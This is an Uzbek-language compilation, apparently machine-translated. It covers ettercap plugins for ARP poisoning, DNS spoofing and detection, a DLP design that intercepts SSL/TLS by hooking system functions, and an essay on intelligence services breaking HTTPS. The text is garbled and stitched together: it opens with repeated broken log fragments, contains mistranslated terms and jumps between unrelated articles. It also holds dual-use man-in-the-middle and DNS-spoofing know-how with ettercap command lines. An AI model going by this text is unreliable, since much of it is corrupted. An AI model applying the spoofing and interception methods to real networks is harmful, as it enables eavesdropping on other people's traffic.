192.168.1.1 arp_cop sifatida koʻrsatmoqda: (OGOHLANTIRISH) 192.168.1.35 oʻzini 192.168.1.1 arp_cop. 19 2.168.1.1 arp_cop: (DIQQAT ) 192.168.1.35 o'zini 192.168.1.1 arp_cop sifatida ko'rsatmoqda: (OGOHLANTIRISH) 192.168.1.35 o'zini 192.168.1.1 arp_cop sifatida ko'rsatmoqda: (OGOHLANTIRISH) 192.168.1.1. arp_cop: arp_cop. (OGOHLANTIRISH) 192.168.1.35 192.168. .1.1 arp_cop: (OGOHLANTIRISH) 192.168.1.35 oʻzini 192.168.1.1 arp_cop sifatida koʻrsatmoqda: (OGOHLANTIRISH) 192.168.1.35 oʻzini 192.168.1.1 arp_cop: 16.WAR 16.19.dan oldingi. 92.16 8.1.1 arp_cop: (Ogohlantirish) 192.168. 1.35 oʻzini 192.168.1.1 arp_cop sifatida koʻrsatmoqda: (OGOHLANTIRISH) 192.168.1.35 oʻzini 192.168.1.1 arp_cop sifatida koʻrsatmoqda: (OGOHLANTIRISH) 192.168.1.1. arp_cop. OGOHLANTIRISH) 192.16 8.1.35 oʻzini 192.168. .1.1............................

ARP zaharlanish mitm hujumiga ulanganda, u avtomatik ravishda yangi qurbonlarni qo'shadi. Mahalliy tarmoqda ARP so'rovlarini qidiradi va agar aniqlansa, plagin ro'yxat TARGET sifatida belgilangan bo'lsa, xostni qurbonlar ro'yxatiga qo'shadi. Xost undan arp so'rovi paydo bo'lganda qo'shiladi.

U ettercap-dagi arp etch modullari muvaffaqiyatli yoki yo'qligini tekshiradi. U soxta ICMP echo paketlarini barcha o'lja qurbonlariga yuboradi va shu bilan birga har bir qurbon bo'lib ko'rinadi. U maqsad sifatida bizning MAC manzilimiz bilan ICMP javobini olishi mumkin, ya'ni ikkita nishon o'rtasidagi o'lja muvaffaqiyatli bo'ladi. U har bir ulanishning ikkala yo'lini ham tekshiradi.

Ushbu plagin DNS so'rovlarini to'xtatadi va soxta (soxta) javob bilan javob beradi. Siz etter.dns faylini tahrirlash orqali plagin qaysi manzilga javob berishini tanlashingiz mumkin. Plagin A, AAAA, PTR, MX, WINS, SRV va TXT so'rovlarini to'xtatadi. Agar bu A so'rovi bo'lsa, unda nom faylda qidiriladi va IP manzil qaytariladi (nomda joker belgilardan foydalanishingiz mumkin).

Xuddi shu narsa AAAA so'rovlariga ham tegishli.

ARP so'rovlarini tinglaydigan juda oddiy plagin sizga xost bilan bog'lanmoqchi bo'lgan barcha maqsadlarni ko'rsatish uchun. Shuningdek, u noma'lum LANlarda manzillarni topishga yordam beradi.

Ettercap -TQzP find_conn ettercap -TQu -i eth0 -P find_conn

LANga yuborilgan ettercap paketlarini aniqlashga harakat qiladi. Bu ettercap ishlatmoqchi bo'lgan odamni aniqlashda foydali bo'lishi mumkin. Unga 100% ishonmang, chunki testlar faqat ma'lum ketma-ketliklar/ID raqamlarida ishlaydi.

Ro'yxatdagi xostlar va biz o'rtasida kimdir o'lja bor yoki yo'qligini tekshirib ko'ramiz. Birinchidan, ro'yxatdagi ikkita xost bir xil yoki yo'qligini tekshiradi mac manzili. Bu ulardan biri o‘zini ikkinchisi qilib ko‘rsatib, bizni zaharlayotganini anglatishi mumkin. U proksi-arp muhitida juda ko'p noto'g'ri pozitivlarni yaratishi mumkin. Ushbu tekshirishni amalga oshirish uchun xostlar ro'yxatini yaratishingiz kerak. Shundan so'ng, u ro'yxatdagi har bir xostga icmp echo paketlarini yuboradi va javob manbasining mac manzili biz ushbu IP bilan ro'yxatda saqlangan manzildan farq qiladimi yoki yo'qligini tekshiradi. Bu kimdir bizning IP manzilimizga ega bo'lib, tutib olingan paketlarni bizga yo'naltirish orqali ushbu xostni o'lja qilayotganini anglatishi mumkin. Ushbu faol testni hujumsiz rejimda ishga tushira olmaysiz.

Ettercap -TQP scan_poisoner //

Kimdir fohisha rejimida hidlash (tinglash) yoki yo'qligini aniqlashga harakat qiladi. U xost ro'yxatidagi har bir maqsadga ikkita turli xil noto'g'ri shakllangan arp so'rovlarini yuboradi va javoblarni kutadi. Agar javob maqsadli xostdan kelgan bo'lsa, maqsadda tarmoq kartasi promiscuous rejimida bo'lishi ehtimoldan yiroq. U noto'g'ri signallarni keltirib chiqarishi mumkin. Siz uni quyidagi kabi ishga tushirishingiz mumkin buyruq qatori yoki plaginlar menyusidan. U arp javoblarini tinglagani uchun arp so'rovlarini yuborishda ulardan foydalanmasangiz yaxshi bo'ladi.

Ettercap -TQP search_promisc /192.168.0.1/ ettercap -TQP search_promisc //

Ikkini muvaffaqiyatli taxmin qilishning misoli tarmoq kartalari tartibsizlik rejimida:

Kengaytirish

Root@HackWare:~# ettercap -TQP search_promisc ettercap 0.8.2 mualliflik huquqi 2001-2015 Ettercap Development Team Tinglash kuni: eth0 -> 08:00:27:AF:30:B9 192.168.1.35/2525:05:a.a. 27ff:feaf:30b9/64 SSL dissektsiyasi etter.conf faylida yaroqli "redir_command_on" skriptiga muhtoj Ettercap to'g'ri ishlamasligi mumkin. /proc/sys/net/ipv6/conf/eth0/use_tempaddr 0 ga o‘rnatilmagan. Imtiyozlar EUID 65534 EGID 65534 ga tushirildi... 33 plaginlar 42 protokol dissektorlari 57 portlar kuzatilgan 20388 mac sotuvchisi barmoq izi xizmatlari 1716 Lu OS ma’lum barmoq izi xizmatlari : hech qanday skriptlar ko'rsatilmagan, ishga tushirilmagan! Skanerlash uchun 255 ta xost tasodifiylashtirilmoqda... 255 ta xostlar uchun butun tarmoq maskasi skanerlanmoqda... * |============================= ============= ======================>

Root@HackWare:~# ettercap -TQP search_promisc ettercap 0.8.2 mualliflik huquqi 2001-2015 Ettercap Development Team Tinglash kuni: eth0 -> 08:00:27:AF:30:B9 192.168.1.35/2525:05:a.a. 27ff:feaf:30b9/64 SSL dissektsiyasi etter.conf faylida yaroqli "redir_command_on" skriptiga muhtoj Ettercap to'g'ri ishlamasligi mumkin. /proc/sys/net/ipv6/conf/eth0/use_tempaddr 0 ga o‘rnatilmagan. Imtiyozlar EUID 65534 EGID 65534 ga tushirildi... 33 plaginlar 42 protokol dissektorlari 57 portlar kuzatilgan 20388 mac sotuvchisi barmoq izi xizmatlari 1716 Lu OS ma’lum barmoq izi xizmatlari : hech qanday skriptlar ko'rsatilmagan, ishga tushirilmagan! Skanerlash uchun 255 ta xost tasodifiylashtirilmoqda... 255 ta xostlar uchun butun tarmoq maskasi skanerlanmoqda... * |============================= ============= =======================>| 100.00% Xostlar roʻyxatiga 5 ta xost qoʻshildi... Birlashtirilgan sniffing ishga tushirildi... Faqat matn interfeysi faollashtirildi... Inline yordam uchun search_promisc plaginini faollashtirish uchun “h” tugmasini bosing... search_promisc: Nostandart NIClar qidirilmoqda... NIClar kamroq boʻlsa kerak. : - 192.168.1.36 - 192.168.1.34 Katta ehtimol bilan sniffing NIC-lar: - YO'Q Matn interfeysi yopilyapti... Ettercap tugatilmoqda... Lua tozalandi! Birlashtirilgan hidlash to'xtatildi.

Ish vaqti SSL mitm hujumlari, ettercap haqiqiy SSL sertifikatini o'ziniki bilan almashtiradi. Soxta sertifikat tezda yaratiladi va barcha maydonlar server tomonidan taqdim etilgan haqiqiy sertifikatga muvofiq to'ldiriladi.

Vazifalar orasida axborot xavfsizligi Maxfiy ma'lumotlarning sizib chiqishiga qarshi kurash tobora muhim ahamiyat kasb etmoqda. Ochiq manbalarga ko'ra, o'tgan 2016 yilda sizib chiqishlar soni 86 foizga oshgan va turli profildagi Rossiya kompaniyalarining 47 foizi ushbu muammoga duch kelgan. Ushbu muammo DLP (Data Loss Prevention) sinf tizimlari yordamida hal qilinadi. Maqolada Windows tizimi funktsiyalarini ushlab turish orqali SSL/TLS trafigini monitoringini ta'minlaydigan bunday tizim modullaridan birini amalga oshirish muhokama qilinadi.

Sızıntılar bilan kurashish muhim ma'lumotlar tarmoq trafigi monitoringini talab qiladi. Bu tarmoq orqali uzatiladigan barcha ma'lumotlarni, jumladan SSL/TLS protokoli orqali shifrlangan ma'lumotlarni tahlil qilishni o'z ichiga oladi.

SSL/TLS protokoli orqali uzatiladigan ma'lumotlarni ushlash o'rtadagi odam hujumi (yoki qisqacha MITM) yordamida mumkin. Buning uchun monitoring tizimi mijoz va server o'rtasida vositachi vazifasini bajaradi. Mijozdan olingan barcha ma'lumotlar avval vositachiga (ya'ni, monitoring tizimiga) o'tadi va keyin serverga uzatiladi. Aksincha, serverdagi barcha ma'lumotlar avval vositachiga etib boradi va keyin mijozga uzatiladi.

1-rasm. O'rtadagi odam hujumi

Agar ma'lumotlar SSL/TLS yordamida uzatilsa, ikkala ulanish ham (mijozdan oraliq serverga va oraliq serverdan haqiqiy serverga) xavfsizdir. Ikkala ulanish ham o'z sertifikati va shaxsiy kalitidan foydalanadi. Oraliq server ikkala ulanish uchun shaxsiy kalitlarga ega va ma'lumotlarni "qayta shifrlaydi": u shifrlangan ma'lumotlarni oladi, shifrini hal qiladi, boshqa shaxsiy kalit bilan shifrlaydi va nihoyat uni yuboradi. Shunday qilib, oraliq serverda barcha uzatilgan ma'lumotlar shifrlanmagan shaklda mavjud.

Sting serveridan foydalanish ikkita muhim kamchilikka ega. Birinchidan, bu oxirgi foydalanuvchi uchun juda sezilarli bo'lishi mumkin. Ikkinchidan, agar oraliq server mijoz mashinasida ishga tushirilsa, OS darajasida ochiq tarmoq ulanishlari soni ikki baravar ko'payadi. Bu OS tarmoq quyi tizimida qo'shimcha yuk yaratadi va bir vaqtning o'zida ko'p miqdordagi ochiq tarmoq ulanishlari talab qilinadigan hollarda muvaffaqiyatsizlikka olib kelishi mumkin.

Tizim funksiyasi qo'ng'iroqlarini ushlab turish o'rtadagi odamni amalga oshirishning yanada oqlangan va oqilona usulini ta'minlaydi. Buning uchun monitoring tizimi allaqachon ishlayotgan jarayonga ulanadi va u uchun tarmoq o'zaro aloqasi paytida ishlatiladigan tizim funktsiyalarini almashtiradi. Bundan tashqari, jarayon to'xtatilgan tizim funktsiyalariga kirganda, boshqaruv monitoring tizimiga o'tkaziladi. Shunday qilib, u jarayonning tarmoq faoliyatini to'liq nazorat qiladi va jarayonning o'zaro ta'sirida vositachi bo'lishi mumkin. masofaviy server.

Shakl 2. Tizim funktsiyalarini to'xtatuvchi vositachi kutubxonasi yordamida o'rtadagi odam hujumi

Mediatsiya kutubxonasi oraliq server bilan bir xil imkoniyatlarga ega. Shunday qilib, mijoz ilovasidan olingan barcha ma'lumotlar avval vositachi kutubxonaga tushadi, so'ngra haqiqiy serverga yo'naltiriladi. Aksincha, haqiqiy serverdan olingan barcha ma'lumotlar avval vositachi kutubxonaga tushadi va keyin dasturga yo'naltiriladi.

3-rasm. Vositachi kutubxona tomonidan ma'lumotlarni ushlab turish

Mijoz ilovasi bilan o'zaro aloqa biroz boshqacha tarzda sodir bo'ladi. Mijoz ilovasi ba'zi tarmoq funksiyalarini chaqirganda proksi kutubxonasi boshqaruvni o'z zimmasiga oladi. Agar chaqirilgan funktsiyada kirish argumentlari bo'lsa, o'rta dastur kutubxonasi ushbu argumentlarning qiymatlarini oladi. Keyinchalik, vositachi kutubxona ushbu funktsiyaning ishlashini "taqlid qiladi" va agar funktsiyada chiqish argumentlari bo'lsa, vositachi kutubxona ushbu argumentlarning qiymatlarini yaratadi. Ushbu mantiq mutlaqo barcha tutilgan funktsiyalarga, jumladan ulanishni o'rnatish, ma'lumotlarni uzatish va server javoblarini qabul qilish funktsiyalariga taalluqlidir.

Vositachi kutubxona bir vaqtning o'zida mijoz ilovasi va masofaviy server bilan o'zaro ta'sir qiladi. Operatsion mantiq mijoz ilovasi tomonidan bajariladigan harakatlarga bog'liq:

1. Yangisini o'rnatish tarmoq ulanishi quyidagicha sodir bo'ladi:
- ilova kerakli narsani chaqiradi tizim funktsiyasi;
- qo'ng'iroq vositachi kutubxonaga uzatiladi;
- vositachi kutubxona server bilan aloqa o'rnatadi va SSL/TLS protokolida ko'zda tutilgan barcha amallarni mustaqil ravishda amalga oshiradi: server sertifikatini tekshirish, o'z sertifikatini yuborish, qo'l siqish, shaxsiy kalitni yaratish va hk.
- vositachi kutubxona nazoratni ilovaga qaytaradi;
- ilova tarmoq aloqasi funktsiyalarini chaqirib, SSL/TLS protokoli orqali ulanish o'rnatish uchun zarur bo'lgan barcha amallarni bajaradi. Mediatsiya kutubxonasi ushbu qo'ng'iroqlarning barchasini ushlab turadi, lekin haqiqiy serverga qo'ng'iroq qilmaydi, lekin dasturning o'ziga "javob beradi". Ilova nuqtai nazaridan, hamma narsa haqiqiy server bilan o'zaro aloqada bo'lganga o'xshaydi (jumladan, qo'l siqish va shaxsiy kalitni yaratish).
Ushbu harakatlar natijasida vositachi kutubxona bir vaqtning o'zida SSL/TLS protokolining ikkita shaxsiy kalitiga ega bo'ladi. Bitta kalit ilova bilan ishlash uchun, ikkinchisi server bilan ishlash uchun ishlatiladi.

2. Ma'lumotlarni serverga uzatish uchun dastur tizim funksiyasini chaqiradi. Allaqachon shifrlangan ma'lumotlar funktsiyaning kirishiga uzatiladi. O'rta dastur kutubxonasi ushbu qo'ng'iroqni to'xtatadi va quyidagilarni amalga oshiradi:
- ilova bilan aloqa o'rnatishda olingan maxfiy kalit yordamida uzatilgan ma'lumotlarning shifrini ochadi;
- server bilan aloqa o'rnatishda olingan maxfiy kalit yordamida olingan ma'lumotlarni shifrlaydi;
- serverga shifrlangan ma'lumotlarni yuboradi.

3. Serverdan ma'lumotlarni qabul qilish shunga o'xshash tarzda sodir bo'ladi, lekin teskari tartibda. Ilova ma'lumotlarni olish funktsiyasini chaqiradi va o'rta dastur kutubxonasi bu qo'ng'iroqni to'xtatadi va quyidagilarni amalga oshiradi:
- serverdan ma'lumotlarning bir qismini oladi;
- server bilan aloqa o'rnatishda olingan maxfiy kalit yordamida olingan ma'lumotlarni shifrini hal qiladi;
- ilova bilan aloqa o'rnatishda olingan maxfiy kalit yordamida olingan ma'lumotlarni shifrlaydi;
- funksiya natijasida shifrlangan ma'lumotlarni (yoki uning bir qismini) qaytaradi.

4. Ulanish uzilganda dastur mos keladigan funksiyani chaqiradi. O'rta dastur kutubxonasi ushbu qo'ng'iroqni ushlab turadi, serverga ulanishni yopadi, uning ichki tuzilmalarini o'chiradi va dasturga boshqaruvni qaytaradi.

Yo‘l harakati to‘xtatib turishning taklif etilayotgan usulini texnik jihatdan amalga oshirish bir qator qiyinchiliklarga duch keladi. Ilova foydalanishi mumkin turli yo'llar bilan tarmoqning o'zaro ta'siri (bloklash va blokirovka qilmaslik rejimi, asenkron ish rejimi va boshqalar). To'liq huquqli monitoring tizimida barcha mumkin bo'lgan amaliy xatti-harakatlar stsenariylarini hisobga olish kerak. Aks holda, monitoring tizimi ishlamay qoladi.

Yana jiddiy muammo shundaki, vositachi kutubxonaning mavjudligi kuchli foydalanuvchi uchun sezilishi mumkin. Proksi-kutubxona server nomidan dasturga "javob beradi", lekin o'zining o'zi imzolangan sertifikatidan foydalanadi. Ko'pgina mijoz ilovalari (masalan, Internet-brauzerlar) serverning o'z-o'zidan imzolangan sertifikati bilan to'g'ri ishlaydi, lekin har doim uni ko'rishga imkon beradi. Agar foydalanuvchi haqiqiy server bilan hech qanday aloqasi bo'lmagan o'z-o'zidan imzolangan sertifikatni ko'rsa, u holda foydalanuvchi vositachi borligidan shubhalanishi mumkin.

Umuman olganda, TLS/SSL trafigini monitoring qilish uchun tavsiya etilgan usul bir necha sabablarga ko'ra juda samarali. Birinchidan, kutubxona dastur va server o'rtasida to'liq vositachi vazifasini bajaradi. U ilovaning barcha tarmoq faoliyatini va barcha yuborilgan/qabul qilingan maʼlumotlarni toʻliq nazorat qiladi. Ikkinchidan, vositachi kutubxonani amalga oshirish muhim tizim resurslarini talab qilmaydi. Va nihoyat, vositachi kutubxonaning mavjudligi faqat tajribali foydalanuvchi uchun seziladi.

So'nggi yillarda razvedka xizmatlarining Internet uchun eng muhim xavfsizlik protokoli TLS/SSLga hujum qilish strategiyasi tendentsiyasining o'zgarishi kuzatildi. Bundan buyon to'g'ridan-to'g'ri kriptografik hujum va xakerlik nafaqat ekstremal, balki ko'pincha keraksizdir. zamonaviy dunyo asosiy harakatlantiruvchi kuch pul va moliyaviy daromad bo'lgan o'lchov.

Ushbu muammoning muhimligi sababli, bir qator nashrlar doirasida, sayt TLS/SSL protokollari stekining xavfsizligi haqida umumiy ma'lumotni taqdim etadi, shu bilan birga razvedka agentliklari tomonidan ushbu protokollarni zaiflashtirish bo'yicha izchil va tizimli strategiyalarni o'rganadi.

Dunyodagi xavfsiz trafikning uchdan bir qismi ataylab zaiflashtirilgan PRNG bilan kriptografik vositalar orqali hosil bo'ladimi?

Boshlang'ich nuqta sifatida, keling, rus misolini ko'rib chiqaylik - sobiq egasi ishi bo'yicha so'nggi sud majlisi to'lov tizimi Aeroflotga qarshi DDoS hujumida ayblangan Chronopay Pavel Vrublevskiy.

Asosiy fitnaning mohiyati shundan iboratki, sud ushbu jinoiy jarayon ishtirokchilari o‘rtasida Facebook’dagi shaxsiy akkauntlari orqali o‘tkazgan ichki yozishmalarni talab qilgan. Unda muhim ayblovchi ma'lumotlar bo'lishiga qaramay, makkor amerikalik ijtimoiy tarmoq Rossiya adliyasining iltimosiga quloq tutmadi va Rossiya fuqarolarining shaxsiy yozishmalariga kirishni rad etdi. Va bu erda ushbu voqeadagi eng dramatik burilish sodir bo'ladi - FSB sud qarorini bajarishda ushbu fuqarolarning yozishmalarini mustaqil ravishda "oladi".

"FSB CIB "Tezkor-qidiruv faoliyati to'g'risida"gi qonunga muvofiq, ko'rsatilgan shaxslarning aloqa kanallaridan mustaqil ravishda ma'lumotlarni to'pladi va DVD diskiga yozib oldi."

Darhaqiqat, mudofaa keyinchalik Facebook irodasiga qarshi kerakli shaxsiy yozishmalar "tarmoqdan to'liq va hajmda olib tashlanganligini" tekshirishga muvaffaq bo'ldi. Shu bilan birga, bu ish bo'yicha ayblanuvchilarning o'zlari tergovga o'zlarining parollari va o'zlarini ayblovchi yozishmalarini taqdim etishni rad etishdi. RuNet-da siz "Rossiya FSBsi Facebook serverlarini buzdi" kabi yorqin yangiliklar sarlavhalarini topishingiz mumkin, ammo xulosalar bilan uzoqqa sakrashingiz kerak emas.

Birinchidan, Facebook bilan barcha aloqa seanslari faqat xavfsiz HTTPS aloqa protokoli orqali amalga oshiriladi. Ikkinchidan, sudlanuvchilar o'rtasidagi so'nggi aloqalardan beri va bu qaror sud (va, demak, FSBning ushbu qarorni amalga oshirish bo'yicha tergov harakatlari) ko'p vaqt o'tdi. Ayblanuvchilarning o'zlari o'shandan beri internetda bo'lmagan, tergov qilinayotgan bo'lsa, bu "o'tmishdagi ma'lumotlar" qanday "kanal"dan "o'chirilishi" mumkin?

Ular sud jarayonida FSB vakillariga berilgan bevosita savollarga e'tibor bermadilar. Javobning eng aniq versiyasi o'zini taklif qildi: ushbu yozishmalar bilan HTTPS trafigini FSB oldindan qo'lga kiritdi/saqlab qo'ydi va keyinchalik qandaydir tarzda buzildi.

Qizig'i shundaki, deyarli shunga o'xshash holat xuddi shu ish materiallarida ilgari qayd etilgan. FSB CIB tergov protokoliga tayanib, "ayblanuvchilardan birining Internetga ulanish trafigini saqlash va tahlil qilish orqali botnet boshqaruv panelidan login va parolni tikladi" (jismoniy jihatdan AQShdagi serverda joylashgan) va keyin ushlangan. masofaviy boshqarish ushbu botnet orqali. Shunday qilib, o'sha veb-panelga kirish ayblanuvchi tomonidan yana faqat shifrlangan HTTPS ulanishi orqali, ehtiyot choralariga rioya qilgan holda amalga oshirildi (masalan, mahalliy kompyuterda parollarni saqlamasdan).

Shunday qilib, biz HTTPS xavfsizligi bilan bog'liq muammolar mavjudligini, Rossiya razvedka xizmatlari tomonidan TLS/SSL "himoyasi" ni engib o'tishning ajoyib holatlarini keltirib o'tamiz.

Shifrlangan HTTPS seansini buzish uchun siz ikkita asosiy muammoni hal qilishingiz kerak bo'ladi: trafikni tinglash (to'xtatib turish) va shuningdek, himoyalangan paketga kiritilgan ma'lumotlarning shifrini ochish.

Biz birinchi nuqtaga batafsil to'xtalmaymiz, chunki maxsus xizmatlar deyarli har qanday kanalga jismoniy kirish imkoniyatiga ega. SORMostroeniyaning so'nggi yangiliklarini kuzatib boradiganlar allaqachon bilishadiki, yangi qonunga muvofiq, 2014 yil 1 iyuldan boshlab barcha Rossiya provayderlari tranzit internet-trafigini kamida 12 soat davomida to‘liq hajmda qayd etish va saqlash uchun o‘z tarmoqlariga maxsus jihozlarni o‘rnatishlari shart. Bundan tashqari, xavfsizlik kuchlari barcha saqlangan va tranzit ma'lumotlar to'plamlariga bevosita kirish huquqiga ega bo'ladi.

Gmail menga shunday yozadi: "Sizning hisobingiz yoki kompyuteringiz hukumat tomonidan qoʻllab-quvvatlanadigan xakerlar tomonidan buzilgan boʻlishi mumkin".

— Roman Dobroxotov (@Dobrokhotov) 2014 yil 9 sentyabr

Agar biz HTTPS seanslarini tinglash haqida gapiradigan bo'lsak, biz darhol qayd etamiz muhim nuqta- ba'zi hollarda tinglashning "faol rejimi" ga bo'lgan ehtiyoj, chunki saqlangan trafikni keyinroq har doim ham buzish mumkin emas. Biz HTTPS protokoli uchun oldinga maxfiylik (FS) deb ataladigan rejim haqida gapiramiz, bu aloqa seansi tugagandan so'ng ma'lumotlarni qayta tiklash imkoniyatini oldini oladi (hatto tajovuzkor keyinchalik tegishli sayt kalitlarini olishga qodir bo'lsa ham). Bunday rejimning mavjudligi tajovuzkorni "temir qizdirilganda urish" - ya'ni real vaqt rejimida ma'lumotlarni buzishga majbur qiladi, bu aksariyat hollarda texnik jihatdan mumkin emas.

Yomon xabar shundaki, Facebook, shuningdek, boshqa ko'plab yirik Internet-portallar oldinga maxfiylikdan foydalanmaydi, chunki u allaqachon haddan tashqari yuklangan ijtimoiy tarmoqqa qo'shimcha jiddiy yuk yaratadi. Bundan tashqari, bunday ilg'or DH algoritmlaridan foydalanish ba'zilari bilan muvofiqlikka salbiy ta'sir ko'rsatishi mumkin mashhur brauzerlar. 2013 yil yozidagi Netcraft statistik ma'lumotlariga ko'ra, ushbu monitoringda kuzatilgan SSL ulanishlarining taxminan 70-99% nima uchun FS-dan umuman foydalanmaganligini endi tushunish oson.

Ya'ni, aksariyat hollarda tajovuzkor HTTPS trafigini keyinchalik sindirish va buzish uchun xavfsiz saqlashi mumkin (masalan, shaxsiy server kaliti ma'lum bo'lganda).

Yuqorida DHE rejimi yoqilgan va o'chirilgan 6 yadroli veb-server protsessorida ishlashning pasayishi o'lchovi keltirilgan. DHE Perfect Forward Secrecy dasturini amalga oshirishning eng mashhur va namunali namunasi sifatida tanlangan. Misol uchun, xizmatlari deyarli barcha kripto-innovatsiyalar va foydalanuvchilarini himoya qilish vositalarini qo'llab-quvvatlaydigan Google (bu umumiy Internet amaliyotidan ajoyib istisno), ECDHE_RSA asosida qisqa muddatli ("efemer") PFS seans kalitlarini amalga oshiradi. Va bu juda, juda qimmat zavq, menga ishoning!

Ushbu eslatmani inobatga olgan holda, biz trafikni ushlab turish bilan hamma narsa ko'proq yoki kamroq aniq deb taxmin qilamiz. Endi saqlangan shifrlangan oqim bilan keyin nima qilish kerakligini ko'rib chiqamiz.

Ko'rinishidan, bu holatda umumiy algoritm quyidagicha ko'rinadi: HTTPS seanslari trafigini qiziqtirgan faraziy razvedka xizmatlari tomonidan ushlanganda, ularning Axborot tizimi o'z ma'lumotlar bazasiga mos keladigan server kalitini qidirish so'rovini oladi. Agar bunday kalit topilmasa, u keyingi hisoblash (yorilish) uchun navbatga qo'yiladi. FS opsiyasining amalda mavjud emasligi haqidagi eslatmani hisobga olgan holda, tizimning real vaqt rejimida shifrni ochish uchun kalitning tayyorligi/mavjudligiga munosabat bildirishini kutmasdan, qiziqish trafigini jimgina yig'ish (yozish) har doim mantiqan to'g'ri keladi.

Server kalitlarining eslatib o'tilgan ma'lumotlar bazasiga kelsak, 2013 yil yozida Cnet anonim qolishni istagan yirik Internet kompaniyasiga NSA so'rovi namunasi va namunaviy hujjatni nashr etdi. Ushbu manbaga ko'ra, boshqa yirik internet platformalari (Google, Microsoft, Apple, Yahoo, AOL, Verizon, AT&T va boshqalar) ham xuddi shunday so'rovlarni qabul qilgani ma'lum bo'ldi. Cnet rasmiy ravishda ushbu tashkilotlarga bunday so'rov faktiga izoh berish so'rovi bilan murojaat qildi, ammo aksariyat hollarda kompaniyalar NSA bilan bunday hamkorlikni tasdiqlash yoki rad etishdan bosh tortdilar.

“Ochiq manba ishonchlilikka olib boruvchi yo‘l degan afsonaga yana bir bor oyog‘imni o‘chiraman. Debian OpenSSL-dagi bu xato deyarli ikki yil edi."

Darhaqiqat, bu zaiflik faqat matbuotdagi shov-shuvdan keyin yopildi. Debian loyihasining o'zi OpenSSL omboridagi uzoq vaqtdan beri mavjud bo'lgan xato bilan bog'liq vaziyatni "juda g'alati voqea" deb atadi.

Agar biz mashhur "xatcho'plar" haqida gapiradigan bo'lsak, yaqinda ular eng kutilmagan joylarda: dazmoldan tortib qahva mashinalarigacha gullab-yashnagan. Shunday qilib, Spiegel ma'lumotlariga ko'ra, NSAning "Moslashtirilgan kirish operatsiyalari" (TAO) maxsus bo'limi. uzoq vaqt turli kompaniyalar va mamlakatlar tomonidan sotib olingan kompyuter (va boshqa) uskunalarni yetkazib beruvchidan oluvchigacha bo‘lgan yo‘lda ommaviy ushlashni amalga oshirdi. Shu bilan birga, NSAga qiziqqan mijozga yuborilgan tutib olingan uskunalar tezda TAO maxfiy "zavodidan" o'tib ketdi, u erda o'zgartirilgan dasturiy ta'minot yoki "xatolar" kiritilgan. Ta'minot jarayoniga o'z maqsadlari uchun "to'siq" maxsus atamasi bilan belgilangan bunday aralashuv NSA tomonidan "zamonaviy operatsiyalarning eng samarali turlaridan biri" sifatida baholangan.

NSA Moslashtirilgan kirish operatsiyalari doirasida millionlab kompyuterlarni zararli dasturlar bilan yuqtirishni rejalashtirmoqda.